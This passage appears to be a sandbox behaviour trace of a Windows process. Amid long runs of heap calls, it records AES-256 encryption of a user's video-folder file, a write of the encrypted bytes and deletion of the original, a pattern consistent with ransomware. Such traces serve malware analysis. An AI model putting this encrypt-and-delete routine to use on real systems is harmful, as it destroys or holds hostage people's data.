lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0101.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0101.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0101.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0101.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0101.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0101.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0101.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0101.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0101.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0101.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0101.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0101.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0101.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0101.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0101.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0101.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0101.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0101.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0101.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0101.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0101.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0101.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0101.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0101.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0101.456] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0101.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0101.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0101.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0101.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797108 [0101.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0101.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0101.458] CryptGetKeyParam (in: hKey=0x41ac200, dwParam=0x7, pbData=0x43e2a60, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2a60*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0101.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0101.458] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0101.458] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0101.537] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.538] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0101.538] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x8e18, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x8e20) returned 1 [0101.538] CharLowerBuffW (in: lpsz="byte[36385]", cchLength=0xb | out: lpsz="byte[36385]") returned 0xb [0101.540] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.540] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0101.540] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4530a70*, pdwDataLen=0x144e088*=0x8e18, dwBufLen=0x8e20 | out: pbData=0x4530a70*, pdwDataLen=0x144e088*=0x8e20) returned 1 [0101.540] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0101.540] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0101.541] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.541] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x8e20, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ea8c*=0x8e20, lpOverlapped=0x0) returned 1 [0101.544] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0101.544] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.544] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cab20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0101.544] CryptDestroyKey (hKey=0x41ac200) returned 1 [0101.544] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0101.544] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0101.544] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.544] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0101.544] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0101.544] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.544] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.545] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0101.545] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0101.545] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0101.545] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.545] FreeLibrary (hLibModule=0x756e0000) returned 1 [0101.545] CloseHandle (hObject=0x298) returned 1 [0101.545] CloseHandle (hObject=0x258) returned 1 [0101.548] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\GPtGPTImgDjIi0576udd.swf", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\GPtGPTImgDjIi0576udd.swf", lpFilePart=0x0) returned 0x5a [0101.548] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\GPtGPTImgDjIi0576udd.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\gptgptimgdjii0576udd.swf")) returned 0x20 [0101.548] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\GPtGPTImgDjIi0576udd.swf", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c544b70, ftCreationTime.dwHighDateTime=0x1d5efa5, ftLastAccessTime.dwLowDateTime=0xf9905a0, ftLastAccessTime.dwHighDateTime=0x1d5ec16, ftLastWriteTime.dwLowDateTime=0xf9905a0, ftLastWriteTime.dwHighDateTime=0x1d5ec16, nFileSizeHigh=0x0, nFileSizeLow=0x8e18, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="GPtGPTImgDjIi0576udd.swf", cAlternateFileName="GPTGPT~1.SWF")) returned 0x41ac280 [0101.548] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\GPtGPTImgDjIi0576udd.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\gptgptimgdjii0576udd.swf")) returned 1 [0101.550] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c544b70, ftCreationTime.dwHighDateTime=0x1d5efa5, ftLastAccessTime.dwLowDateTime=0xf9905a0, ftLastAccessTime.dwHighDateTime=0x1d5ec16, ftLastWriteTime.dwLowDateTime=0xf9905a0, ftLastWriteTime.dwHighDateTime=0x1d5ec16, nFileSizeHigh=0x0, nFileSizeLow=0x8e18, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="GPtGPTImgDjIi0576udd.swf", cAlternateFileName="GPTGPT~1.SWF")) returned 0 [0101.550] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0101.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0101.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0101.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0101.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0101.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0101.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0101.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0101.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0101.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0101.551] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0101.551] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0101.551] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0101.551] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0101.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0101.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0101.551] CharUpperBuffW (in: 